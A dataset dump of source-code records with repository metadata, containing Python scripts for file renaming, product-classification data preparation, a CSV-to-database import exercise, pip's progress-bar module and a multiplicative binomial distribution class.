blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
107191d3078278d3565473fa95b4f56689fd46fe | b066aa3489191fe01f65798d9b269df4401d87f5 | /works/renamefiles.py | 3fef1cb7806640a8203e9bc5fe6c69d2c2c0aff8 | [] | no_license | yinzhendong/myworks | 1936826b2e16550f0f7f7c92a9572e75ea3405b7 | 0ec39854a5bc90a5c93227c79eb40224189f1eca | refs/heads/master | 2022-01-29T10:12:35.308744 | 2022-01-12T06:50:43 | 2022-01-12T06:50:43 | 215,003,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 746 | py | import os, time, random
def renameFiles(path, prefix):
for root, dirs, files in os.walk(path):
count = 1
for file in files:
# get file postfix
postfix = file.split('.')[-1]
# make new file name with prefix and count.
# example: 20200406.1.mp4
newfilename = prefix + '.' + str(count) + '.' +postfix
count += 1
print(file + '-->' + newfilename)
os.rename(os.path.join(path, file), os.path.join(path, newfilename))
# path = '/home/trent/data/temp/'
# path = '/home/trent/data/for'
path = 'D:\\temp\\'
# path = 'D:\\clips\\'
# date = time.strftime('%Y%m%d%H%M%S')
prefix = time.strftime('%Y%m%d%H%M%S')
renameFiles(path, prefix)
| [
"443723640@qq.com"
] | 443723640@qq.com |
3fc066210b8493bb0d40a8279d61d93f4157055a | 602fa0e4ce194d3073d78230c61f7053281f9f9b | /code/python/src/util/data_util.py | b08a962dd0200b383f1b66164fc7b1e43403c0a4 | [] | no_license | ziqizhang/wop | 111cfdda1686a874ff1fc11a453a23fb52d43af1 | ea0c37f444de9f2d5303f74b989f6d1a09feb61d | refs/heads/master | 2022-09-14T20:14:11.575021 | 2021-12-10T21:23:24 | 2021-12-10T21:23:24 | 166,239,995 | 2 | 1 | null | 2022-09-01T23:11:13 | 2019-01-17T14:33:51 | Python | UTF-8 | Python | false | false | 13,037 | py | #read csv data as dataframe, perform stratisfied sampling and output the required sample
import collections
import csv
import json
import pickle
import numpy
import pandas as pd
from sklearn import model_selection
from sklearn.model_selection import train_test_split
#prepare data to fasttext format
def to_fasttext(inCSV, textCol, classCol, outfile):
df = pd.read_csv(inCSV, delimiter="\t", quoting=0, encoding="utf-8"
).as_matrix()
df.astype(str)
X = df[:, textCol]
y = df[:, classCol]
counter = collections.Counter(y)
single_instance = 0
with open(outfile, mode='w') as file:
csvwriter = csv.writer(file, delimiter='\t', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for i in range(len(X)):
label = y[i]
if counter[label] == 1:
single_instance += 1
continue
text=X[i]
csvwriter.writerow(["__label__"+label, text])
print(str(single_instance) + " has only one instance and are deleted")
def subset(inCSV, textCol, classCol, outfolder, percentage):
df = pd.read_csv(inCSV, delimiter="\t", quoting=0, encoding="utf-8"
).as_matrix()
df.astype(str)
X=df[:, textCol]
y = df[:, classCol]
counter=collections.Counter(y)
X_new=[]
y_new=[]
single_instance=0
for i in range(len(X)):
label=y[i]
if counter[label]==1:
single_instance+=1
else:
X_new.append(X[i])
y_new.append(y[i])
print(str(single_instance)+" has only one instance and are deleted")
X_train, X_test, y_train, y_test, \
indices_train, indices_test= model_selection.train_test_split(X_new, y_new, range(len(X_new)), test_size=percentage, random_state=0,
stratify=y_new)
filename=inCSV[inCSV.rfind("/")+1: inCSV.rfind(".tsv")]
with open(outfolder+"/"+filename+"_"+str(percentage)+".index", 'w') as f:
for i in indices_test:
f.write(str(i)+"\n")
with open(outfolder+"/"+filename+"_"+str(percentage)+".tsv", mode='w') as employee_file:
csvwriter = csv.writer(employee_file, delimiter='\t', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for i in range(len(X_test)):
label = y_test[i]
text=X_test[i]
csvwriter.writerow([text, label])
''''
This method reads the json data file (train/val/test) in the SWC2020 mwpd format and save them as a matrix where each
row is an instance with the following columns:
- 0: id
- 1: name
- 2: description
- 3: categorytext
- 4: url
- 5: lvl1
- 6: lvl2
- 7: lvl3
'''
def read_mwpdformat_to_matrix(in_file):
matrix=[]
with open(in_file) as file:
line = file.readline()
while line is not None and len(line)>0:
js=json.loads(line)
row=[js['ID'],js['Name'],js['Description'],js['CategoryText'],js['URL'],js['lvl1'],js['lvl2'],js['lvl3']]
matrix.append(row)
line=file.readline()
return matrix
'''
given the input WDC prod cat GS product offers, and also the train/test set of 2155 clusters
containing product offers derived from this GS, split the GS into train/test containing product offers
based on their cluster membership and the cluster's presence in train/test
'''
def split_wdcGS_by_traintestsplit(train_file, test_file, gs_file,
outfolder):
train_ids=set()
test_ids=set()
with open(train_file) as file:
line = file.readline()
js=json.loads(line)
for ent in js:
train_ids.add(ent['cluster_id'])
with open(test_file) as file:
line = file.readline()
js=json.loads(line)
for ent in js:
test_ids.add(ent['cluster_id'])
writer_train=open(outfolder+"/wdc_gs_train.json",'w')
writer_test=open(outfolder+"/wds_gs_test.json",'w')
with open(gs_file) as file:
line = file.readline()
js=json.loads(line)
for ent in js:
out_line = json.dumps(ent)
if str(ent['cluster_id']) in train_ids:
writer_train.write(out_line+"\n")
else:
writer_test.write(out_line+"\n")
writer_train.close()
writer_test.close()
def read_wdcgsformat_to_matrix(in_file):
matrix=[]
with open(in_file) as file:
line = file.readline()
while line is not None and len(line) > 0:
ent = json.loads(line)
#id, name, desc, brand, manufacturer, url, label
# if ent['cluster_id']==12261043:
# print("")
try:
row=[ent['cluster_id'],"","","","",ent['url'],ent['categoryLabel']]
schema_prop=ent['schema.org_properties']
for d in schema_prop:
if '/name' in d.keys():
row[1]=d['/name'][1:-2].strip()
elif '/description' in d.keys():
row[2]= d['/description'][1:-2].strip()
elif '/brand' in d.keys():
row[3]=d['/brand'][1:-2].strip()
elif '/manufacturer' in d.keys():
row[4]=d['/manufacturer'][1:-2].strip()
schema_prop = ent['parent_schema.org_properties']
for d in schema_prop:
if row[1]=='' and '/name' in d.keys():
row[1]=d['/name'][1:-2].strip()
elif row[1]=='' and '/title' in d.keys():
row[1]=d['/title'][1:-2].strip()
elif row[2]=='' and'/description' in d.keys():
row[2]= d['/description'][1:-2].strip()
elif row[3]=='' and'/brand' in d.keys():
row[3]=d['/brand'][1:-2].strip()
elif row[4]=='' and'/manufacturer' in d.keys():
row[4]=d['/manufacturer'][1:-2].strip()
matrix.append(row)
except:
print("Error encountered")
line=file.readline()
# row=[js['ID'],js['Name'],js['Description'],js['CategoryText'],js['URL'],js['lvl1'],js['lvl2'],js['lvl3']]
# matrix.append(row)
# line=file.readline()
return matrix
''''
This method reads the json data file (train/val/test) in the SWC2020 mwpd format and save them as a matrix where each
row is an instance with the following columns:
- 0: ID
- 1: Description.URL
- 2: Brand
- 3: SummaryDescription.LongSummaryDescription
- 4: Title
- 5: Category.CategoryID
- 6: Category.Name.Value
'''
def read_icecatformat_to_matrix(in_file):
matrix=[]
with open(in_file) as file:
line = file.readline()
while line is not None and len(line)>0:
js=json.loads(line)
row=[js['ID'],js['Description.URL'],
js['Brand'],js['SummaryDescription.LongSummaryDescription'],
js['Title'],js['Category.CategoryID'],js['Category.Name.Value']]
# row = [js['ID'], "",
# "", "",
# js['Title'], "",""]
matrix.append(row)
line=file.readline()
return matrix
''''
This method reads the original training data file for the fakeproductreview dataset
fake_reviews_dataset.csv (download from https://osf.io/3vds7/)
and randomly split it into 80:20 train/test split
'''
def split_fakeproductrev_to_holdout(in_file, out_folder):
df = pd.read_csv(in_file, header=0, delimiter=",", quoting=0, encoding="utf-8",
)
headers=["category","rating","text","label"]
X=[]
for index, row in df.iterrows():
r = [row[0], row[1], row[3]]
X.append(r)
y = df.iloc[:,2]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20, random_state = 42)
y_train = list(y_train)
y_test=list(y_test)
outfile=out_folder+"/fakeproductrev_train.csv"
with open(outfile, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(headers)
for i in range(0, len(X_train)):
r = X_train[i]
r.append(y_train[i])
writer.writerow(r)
outfile=out_folder+"/fakeproductrev_test.csv"
with open(outfile, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(headers)
for i in range(0, len(X_test)):
r = X_test[i]
r.append(y_test[i])
writer.writerow(r)
def convert_icecatformat_to_json(in_file, out_file):
outwriter = open(out_file,"w")
with open(in_file, 'rb') as f:
data = pickle.load(f)
# for h in list(data.columns.values):
# print(h)
count=0
for id, row_data in data.iterrows():
entry={}
count+=1
entry['ID'] = str(id)
entry['Description.URL']=replace_nan(row_data['Description.URL'])
entry['Brand']=replace_nan(row_data['Brand'])
entry['SummaryDescription.LongSummaryDescription']= replace_nan(row_data['SummaryDescription.LongSummaryDescription'])
entry['Title']=replace_nan(row_data['Title'])
entry['Category.CategoryID'] = replace_nan(row_data['Category.CategoryID'])
entry['Category.Name.Value'] = replace_nan(row_data['Category.Name.Value'])
line=json.dumps(entry)
outwriter.write(line+"\n")
if count%5000 ==0:
print(count)
print(count)
outwriter.close()
def replace_nan(v):
if type(v) is float and numpy.isnan(v):
return ""
else:
return v
#Brand
#Category.Name.Value
#SummaryDescription.ShortSummaryDescription
#Title
#Description.URL
if __name__ == "__main__":
split_fakeproductrev_to_holdout("/home/zz/Work/data/wop_productfakerev/fake_reviews_dataset.csv",
"/home/zz/Work/data/wop_productfakerev")
exit(0)
# train=read_wdcgsformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/wdc_gs_train.json")
# test=read_wdcgsformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/wdc_gs_test.json")
# cls = set()
# for l in train:
# cls.add(l[6])
# print(len(cls))
# exit(0)
# train = read_icecatformat_to_matrix(
# "/home/zz/Work/data/IceCAT/icecat_data_train.json")
# val = read_icecatformat_to_matrix(
# "/home/zz/Work/data/IceCAT/icecat_data_validate.json")
# test = read_icecatformat_to_matrix(
# "/home/zz/Work/data/IceCAT/icecat_data_test.json")
#
# cls = set()
# for l in train:
# cls.add(l[6])
# print(len(cls))
# exit(0)
train = read_mwpdformat_to_matrix(
"/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/train.json")
val = read_mwpdformat_to_matrix(
"/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/validation.json")
test = read_mwpdformat_to_matrix(
"/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/swc2020/test.json")
cls1 = set()
cls2 = set()
cls3 = set()
for l in train:
cls1.add(l[5])
cls2.add(l[6])
cls3.add(l[7])
print(len(cls1))
exit(0)
#inCSV="/home/zz/Work/data/Rakuten/rdc-catalog-train.tsv"
# outfolder="/home/zz/Work/data/Rakuten/"
# subset(inCSV, 0, 1, outfolder, 0.2)
#
# inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold.tsv"
# outfolder = "/home/zz/Work/data/Rakuten/"
# subset(inCSV, 0, 1, outfolder, 0.2)
# inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-train.tsv"
# outCSV="/home/zz/Work/data/Rakuten/rdc-catalog-train_fasttext.tsv"
# to_fasttext(inCSV,0,1,outCSV)
#
# inCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold.tsv"
# outCSV = "/home/zz/Work/data/Rakuten/rdc-catalog-gold_fasttext.tsv"
# to_fasttext(inCSV, 0, 1, outCSV)
#categories_clusters_testing.json
# read_wdcformat_to_matrix("/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_training.json")
# print("end")
# split_wdcGS_by_traintestsplit('/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_training.json',
# '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_clusters_testing.json',
# '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS/categories_gold_standard_offers.json',
# '/home/zz/Cloud/GDrive/ziqizhang/project/mwpd/prodcls/data/WDC_CatGS')
convert_icecatformat_to_json("/home/zz/Work/data/IceCAT/icecat_data_validate.pkl",
"/home/zz/Work/data/IceCAT/icecat_data_validate.json")
#read_icecatformat_to_matrx("/home/zz/Work/data/IceCAT/icecat_data_test_target.pkl") | [
"ziqizhang.email@gmail.com"
] | ziqizhang.email@gmail.com |
2bf6975be2364368e2cde8343d00d2f3ef6bec03 | a571488aa7a5027e0ed466081e30cb18469f98f9 | /(Pre-July) 4. SQL/import.py | 8423c46a37fa976b2b0214c49e32e0d134c06d17 | [] | no_license | DeetoMok/CS50 | f8d84105344ec256fdbecf96fb72b7bdf5c8bd96 | 4ad932bfd910a6b9602d4754a495f202c9bc9ecf | refs/heads/master | 2023-02-02T08:21:08.350081 | 2020-12-20T12:29:03 | 2020-12-20T12:29:03 | 286,779,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 856 | py | import csv
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
engine = create_engine(os.getenv("DATABASE_URL"))
db = scoped_session(sessionmaker(bind=engine))
def main():
f = open(flights.csv)
render = csv.reader(f)
# Where col 1 is origin, col 2 is destination, ...
for o, dest, dur in reader:
# :origin is a placeholder for origin, since the value is not yet known
db.execute("INSERT INTO flights(origin, destination, duration) VALUES (:origin, :destination, :duration)",
{"origin": o, "destination": dest, "duration": dur})
#encased in {} is a python dict that tells the placeholder what to put in based on the reader
print(f"Added flight from {o} to {dest} lasting {duration}")
db.commit()
if __name__ == "__main__":
main() | [
"54903425+DeetoMok@users.noreply.github.com"
] | 54903425+DeetoMok@users.noreply.github.com |
72f8181b7c4daaf75a65c514a5d3b2a6004cb679 | f8972963bc77887221f900209b417915c7920747 | /venv/lib/python3.6/site-packages/pip-10.0.1-py3.6.egg/pip/_internal/utils/ui.py | d7b3de8c0d7fbd55441ba19daede31ad778a0459 | [] | no_license | patilmanojk/UpGradProHackathonTeamTechPals | 3b35a9eaa9fb84ccd3579bd938c240169412da34 | 6bedd9e997089c5ca47709e072f6651b89faafa3 | refs/heads/master | 2020-07-28T05:51:40.672852 | 2019-09-26T19:24:45 | 2019-09-26T19:24:45 | 209,329,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,056 | py | from __future__ import absolute_import, division
import contextlib
import itertools
import logging
import sys
import time
from signal import SIGINT, default_int_handler, signal
from pip._internal.compat import WINDOWS
from pip._internal.utils.logging import get_indentation
from pip._internal.utils.misc import format_size
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
from pip._vendor import six
from pip._vendor.progress.bar import (
Bar, ChargingBar, FillingCirclesBar, FillingSquaresBar, IncrementalBar,
ShadyBar,
)
from pip._vendor.progress.helpers import HIDE_CURSOR, SHOW_CURSOR, WritelnMixin
from pip._vendor.progress.spinner import Spinner
if MYPY_CHECK_RUNNING:
from typing import Any
try:
from pip._vendor import colorama
# Lots of different errors can come from this, including SystemError and
# ImportError.
except Exception:
colorama = None
logger = logging.getLogger(__name__)
def _select_progress_class(preferred, fallback):
encoding = getattr(preferred.file, "encoding", None)
# If we don't know what encoding this file is in, then we'll just assume
# that it doesn't support unicode and use the ASCII bar.
if not encoding:
return fallback
# Collect all of the possible characters we want to use with the preferred
# bar.
characters = [
getattr(preferred, "empty_fill", six.text_type()),
getattr(preferred, "fill", six.text_type()),
]
characters += list(getattr(preferred, "phases", []))
# Try to decode the characters we're using for the bar using the encoding
# of the given file, if this works then we'll assume that we can use the
# fancier bar and if not we'll fall back to the plaintext bar.
try:
six.text_type().join(characters).encode(encoding)
except UnicodeEncodeError:
return fallback
else:
return preferred
_BaseBar = _select_progress_class(IncrementalBar, Bar) # type: Any
class InterruptibleMixin(object):
"""
Helper to ensure that self.finish() gets called on keyboard interrupt.
This allows downloads to be interrupted without leaving temporary state
(like hidden cursors) behind.
This class is similar to the progress library's existing SigIntMixin
helper, but as of version 1.2, that helper has the following problems:
1. It calls sys.exit().
2. It discards the existing SIGINT handler completely.
3. It leaves its own handler in place even after an uninterrupted finish,
which will have unexpected delayed effects if the user triggers an
unrelated keyboard interrupt some time after a progress-displaying
download has already completed, for example.
"""
def __init__(self, *args, **kwargs):
"""
Save the original SIGINT handler for later.
"""
super(InterruptibleMixin, self).__init__(*args, **kwargs)
self.original_handler = signal(SIGINT, self.handle_sigint)
# If signal() returns None, the previous handler was not installed from
# Python, and we cannot restore it. This probably should not happen,
# but if it does, we must restore something sensible instead, at least.
# The least bad option should be Python's default SIGINT handler, which
# just raises KeyboardInterrupt.
if self.original_handler is None:
self.original_handler = default_int_handler
def finish(self):
"""
Restore the original SIGINT handler after finishing.
This should happen regardless of whether the progress display finishes
normally, or gets interrupted.
"""
super(InterruptibleMixin, self).finish()
signal(SIGINT, self.original_handler)
def handle_sigint(self, signum, frame):
"""
Call self.finish() before delegating to the original SIGINT handler.
This handler should only be in place while the progress display is
active.
"""
self.finish()
self.original_handler(signum, frame)
class SilentBar(Bar):
def update(self):
pass
class BlueEmojiBar(IncrementalBar):
suffix = "%(percent)d%%"
bar_prefix = " "
bar_suffix = " "
phases = (u"\U0001F539", u"\U0001F537", u"\U0001F535") # type: Any
class DownloadProgressMixin(object):
def __init__(self, *args, **kwargs):
super(DownloadProgressMixin, self).__init__(*args, **kwargs)
self.message = (" " * (get_indentation() + 2)) + self.message
@property
def downloaded(self):
return format_size(self.index)
@property
def download_speed(self):
# Avoid zero division errors...
if self.avg == 0.0:
return "..."
return format_size(1 / self.avg) + "/s"
@property
def pretty_eta(self):
if self.eta:
return "eta %s" % self.eta_td
return ""
def iter(self, it, n=1):
for x in it:
yield x
self.next(n)
self.finish()
class WindowsMixin(object):
def __init__(self, *args, **kwargs):
# The Windows terminal does not support the hide/show cursor ANSI codes
# even with colorama. So we'll ensure that hide_cursor is False on
# Windows.
# This call neds to go before the super() call, so that hide_cursor
# is set in time. The base progress bar class writes the "hide cursor"
# code to the terminal in its init, so if we don't set this soon
# enough, we get a "hide" with no corresponding "show"...
if WINDOWS and self.hide_cursor:
self.hide_cursor = False
super(WindowsMixin, self).__init__(*args, **kwargs)
# Check if we are running on Windows and we have the colorama module,
# if we do then wrap our file with it.
if WINDOWS and colorama:
self.file = colorama.AnsiToWin32(self.file)
# The progress code expects to be able to call self.file.isatty()
# but the colorama.AnsiToWin32() object doesn't have that, so we'll
# add it.
self.file.isatty = lambda: self.file.wrapped.isatty()
# The progress code expects to be able to call self.file.flush()
# but the colorama.AnsiToWin32() object doesn't have that, so we'll
# add it.
self.file.flush = lambda: self.file.wrapped.flush()
class BaseDownloadProgressBar(WindowsMixin, InterruptibleMixin,
DownloadProgressMixin):
file = sys.stdout
message = "%(percent)d%%"
suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s"
# NOTE: The "type: ignore" comments on the following classes are there to
# work around https://github.com/python/typing/issues/241
class DefaultDownloadProgressBar(BaseDownloadProgressBar,
_BaseBar): # type: ignore
pass
class DownloadSilentBar(BaseDownloadProgressBar, SilentBar): # type: ignore
pass
class DownloadIncrementalBar(BaseDownloadProgressBar, # type: ignore
IncrementalBar):
pass
class DownloadChargingBar(BaseDownloadProgressBar, # type: ignore
ChargingBar):
pass
class DownloadShadyBar(BaseDownloadProgressBar, ShadyBar): # type: ignore
pass
class DownloadFillingSquaresBar(BaseDownloadProgressBar, # type: ignore
FillingSquaresBar):
pass
class DownloadFillingCirclesBar(BaseDownloadProgressBar, # type: ignore
FillingCirclesBar):
pass
class DownloadBlueEmojiProgressBar(BaseDownloadProgressBar, # type: ignore
BlueEmojiBar):
pass
class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin,
DownloadProgressMixin, WritelnMixin, Spinner):
file = sys.stdout
suffix = "%(downloaded)s %(download_speed)s"
def next_phase(self):
if not hasattr(self, "_phaser"):
self._phaser = itertools.cycle(self.phases)
return next(self._phaser)
def update(self):
message = self.message % self
phase = self.next_phase()
suffix = self.suffix % self
line = ''.join([
message,
" " if message else "",
phase,
" " if suffix else "",
suffix,
])
self.writeln(line)
BAR_TYPES = {
"off": (DownloadSilentBar, DownloadSilentBar),
"on": (DefaultDownloadProgressBar, DownloadProgressSpinner),
"ascii": (DownloadIncrementalBar, DownloadProgressSpinner),
"pretty": (DownloadFillingCirclesBar, DownloadProgressSpinner),
"emoji": (DownloadBlueEmojiProgressBar, DownloadProgressSpinner)
}
def DownloadProgressProvider(progress_bar, max=None):
if max is None or max == 0:
return BAR_TYPES[progress_bar][1]().iter
else:
return BAR_TYPES[progress_bar][0](max=max).iter
################################################################
# Generic "something is happening" spinners
#
# We don't even try using progress.spinner.Spinner here because it's actually
# simpler to reimplement from scratch than to coerce their code into doing
# what we need.
################################################################
@contextlib.contextmanager
def hidden_cursor(file):
# The Windows terminal does not support the hide/show cursor ANSI codes,
# even via colorama. So don't even try.
if WINDOWS:
yield
# We don't want to clutter the output with control characters if we're
# writing to a file, or if the user is running with --quiet.
# See https://github.com/pypa/pip/issues/3418
elif not file.isatty() or logger.getEffectiveLevel() > logging.INFO:
yield
else:
file.write(HIDE_CURSOR)
try:
yield
finally:
file.write(SHOW_CURSOR)
class RateLimiter(object):
def __init__(self, min_update_interval_seconds):
self._min_update_interval_seconds = min_update_interval_seconds
self._last_update = 0
def ready(self):
now = time.time()
delta = now - self._last_update
return delta >= self._min_update_interval_seconds
def reset(self):
self._last_update = time.time()
class InteractiveSpinner(object):
def __init__(self, message, file=None, spin_chars="-\\|/",
# Empirically, 8 updates/second looks nice
min_update_interval_seconds=0.125):
self._message = message
if file is None:
file = sys.stdout
self._file = file
self._rate_limiter = RateLimiter(min_update_interval_seconds)
self._finished = False
self._spin_cycle = itertools.cycle(spin_chars)
self._file.write(" " * get_indentation() + self._message + " ... ")
self._width = 0
def _write(self, status):
assert not self._finished
# Erase what we wrote before by backspacing to the beginning, writing
# spaces to overwrite the old text, and then backspacing again
backup = "\b" * self._width
self._file.write(backup + " " * self._width + backup)
# Now we have a blank slate to add our status
self._file.write(status)
self._width = len(status)
self._file.flush()
self._rate_limiter.reset()
def spin(self):
if self._finished:
return
if not self._rate_limiter.ready():
return
self._write(next(self._spin_cycle))
def finish(self, final_status):
if self._finished:
return
self._write(final_status)
self._file.write("\n")
self._file.flush()
self._finished = True
# Used for dumb terminals, non-interactive installs (no tty), etc.
# We still print updates occasionally (once every 60 seconds by default) to
# act as a keep-alive for systems like Travis-CI that take lack-of-output as
# an indication that a task has frozen.
class NonInteractiveSpinner(object):
def __init__(self, message, min_update_interval_seconds=60):
self._message = message
self._finished = False
self._rate_limiter = RateLimiter(min_update_interval_seconds)
self._update("started")
def _update(self, status):
assert not self._finished
self._rate_limiter.reset()
logger.info("%s: %s", self._message, status)
def spin(self):
if self._finished:
return
if not self._rate_limiter.ready():
return
self._update("still running...")
def finish(self, final_status):
if self._finished:
return
self._update("finished with status '%s'" % (final_status,))
self._finished = True
@contextlib.contextmanager
def open_spinner(message):
# Interactive spinner goes directly to sys.stdout rather than being routed
# through the logging system, but it acts like it has level INFO,
# i.e. it's only displayed if we're at level INFO or better.
# Non-interactive spinner goes through the logging system, so it is always
# in sync with logging configuration.
if sys.stdout.isatty() and logger.getEffectiveLevel() <= logging.INFO:
spinner = InteractiveSpinner(message)
else:
spinner = NonInteractiveSpinner(message)
try:
with hidden_cursor(sys.stdout):
yield spinner
except KeyboardInterrupt:
spinner.finish("canceled")
raise
except Exception:
spinner.finish("error")
raise
else:
spinner.finish("done")
| [
"patilmanojk@gmail.com"
] | patilmanojk@gmail.com |
4a2edd27b685ec913189effd9e6de50548c275d2 | 22cb2dcd5aff07d03217f03344817148532546de | /MultiplicativeBinomial.py | 17262dfb344cea78092f87e578f31681a6a88e04 | [] | no_license | thomasjdelaney/Multiplicative_Binomial_Distribution | 5789609e05392fcb5363d4e816206334b9caf5b2 | 080f8acdda4ad4aee6b85a518a44ef12beb391ba | refs/heads/master | 2022-04-22T07:26:59.184713 | 2020-04-17T16:32:31 | 2020-04-17T16:32:31 | 256,489,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,736 | py | """
For the class of MultiplicativeBinomial distribution object and all useful functions relating to it.
"""
import numpy as np
from scipy.special import comb
from scipy.optimize import minimize
class MultiplicativeBinomial(object):
def __init__(self, p, theta, m):
"""
Creates the Conway-Maxwell binomial distribution with parameters p, nu, and m. Calculates the normalising function during initialisation. Uses exponents and logs to avoid overflow.
Arguments: self,
p, real 0 <= p <= 1, probability of success
theta, real, dispersion parameter
m, number of trials
Returns: object
"""
self.p = p
self.theta = theta
self.m = m
self.normaliser = self.getNormaliser()
self.has_samp_des_dict = False
self.samp_des_dict, self.has_samp_des_dict = self.getSamplingDesignDict()
def pmf_atomic(self, k):
"""
Probability mass function. Uses exponents and logs to avoid overflow.
Arguments: self, ConwayMaxwellBinomial object,
k, int, must be an integer in the interval [0, m]
Returns: P(k)
"""
if (k > self.m) | (k != int(k)) | (k < 0):
raise ValueError("k must be an integer between 0 and m, inclusive")
if self.p == 1:
p_k = 1 if k == self.m else 0
elif self.p == 0:
p_k = 1 if k == 0 else 0
elif self.has_samp_des_dict:
p_k = self.samp_des_dict.get(k)
else:
p_k = self.getProbMassForCount(k)/self.normaliser
return p_k
def pmf(self, k):
"""
Probability mass function that can take lists or atomics.
Arguments: self, ConwayMaxwellBinomial object,
k, int, or list of ints
Returns: P(k)
"""
if np.isscalar(k):
return self.pmf_atomic(k)
else:
return np.array([self.pmf_atomic(k_i) for k_i in k])
def logpmf(self, k):
"""
Log probability mass function. Does what it says on the tin.
Improvement might be possible, later.
Arguments: self, ConwayMaxwellBinomial object,
k, int, must be an integer in the interval [0,m]
Returns: log P(k)
"""
return np.log(self.pmf(k))
def cdf_atomic(self, k):
"""
For getting the cumulative distribution function of the distribution at k.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0,m]
Returns: float
NB: this function relies on the sampling design dictionary keys being sorted!
"""
accumulated_density = 0
if (k > self.m) | (k != int(k)) | (k < 0):
raise ValueError("k must be an integer between 0 and m, inclusive")
elif k == 0:
return self.samp_des_dict[0]
elif k == self.m:
return 1.0
else:
for dk,dv in self.samp_des_dict.items():
if dk <= k:
accumulated_density += dv
else:
return accumulated_density # avoids looping through all the keys unnecessarily.
def cdf(self, k):
"""
For getting the cumulative distribution function at k, or a list of k.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0,m]
Returns: float or array of floats
"""
if np.isscalar(k):
return self.cdf_atomic(k)
else:
return np.array([self.cdf_atomic(k_i) for k_i in k])
def getSamplingDesignDict(self):
"""
Returns a dictionary representing the sampling design of the distribution. That is, samp_des_dict[k] = pmf(k)
Arguments: self, the distribution object,
Returns: samp_des_dict, dictionary, int => float
has_samp_des_dict, True
"""
possible_values = range(0,self.m+1)
samp_des_dict = dict(zip(possible_values, self.pmf(possible_values)))
has_samp_des_dict = True
return samp_des_dict, has_samp_des_dict
def rvs(self, size=1):
return np.random.choice(range(0,self.m + 1), size=size, replace=True, p=list(self.samp_des_dict.values()))
def getNormaliser(self):
"""
For calculating the normalising factor of the distribution.
Arguments: self, the distribution object
Returns: the value of the normalising factor S(p,nu)
"""
if (self.p == 0) | (self.p == 1):
warnings.warn("p = " + str(self.p) + " The distribution is deterministic.")
return 0
else:
return np.sum([self.getProbMassForCount(k) for k in range(0, self.m + 1)])
def getProbMassForCount(self, k):
"""
For calculating the unnormalised probability mass for an individual count.
Arguments: self, the distribution object
k, int, must be an integer in the interval [0, m]
Returns: float,
"""
return np.exp(np.log(comb(self.m, k)) + (k * np.log(self.p)) + ((self.m - k) * np.log(1-self.p)) + (k * (self.m - k) * np.log(self.theta)))
def multiplicativeBinomialNegLogLike(params, m, samples):
"""
For calculating the negative log likelihood at p,theta.
Arguments: params: p, 0 <= p <= 1
theta, float, dispersion parameter
m, number of bernoulli variables
samples, ints between 0 and m, data.
Returns: float, negative log likelihood
"""
p, theta = params
if (p == 1) | (p == 0):
return np.infty
n = samples.size
multi_bin_dist = MultiplicativeBinomial(p, theta, m)
p_part = np.log(p/(1-p))*samples.sum()
theta_part = np.log(theta) * np.sum((samples*(m-samples)))
partition_part = np.log(multi_bin_dist.normaliser) - (m * np.log(1-p))
return n*partition_part - p_part - theta_part - np.log(comb(m,samples)).sum()
def estimateParams(m, samples, init):
"""
For estimating the parameters of the Conway-Maxwell binomial distribution from the given samples.
Arguments: m, the number of bernoulli variables being used.
samples, ints, between 0 and m
init, initial guess for the parameters, p and theta
Return: the fitted params, p and theta
"""
bnds = ((np.finfo(float).resolution, 1 - np.finfo(float).resolution),(np.finfo(float).resolution,None))
res = minimize(multiplicativeBinomialNegLogLike, init, args=(m,samples), bounds=bnds)
return res.x
| [
"thomas.delaney@posteo.net"
] | thomas.delaney@posteo.net |
8d87c9e0c2d652d34e9fa4039380342998515f3e | fb63e8ddaead99538d7b46467166904cd8b34580 | /weeklylpall-20160101.py | 3f82de2d98e1cabffaac9a32cb9d71436f500a69 | [
"BSD-3-Clause"
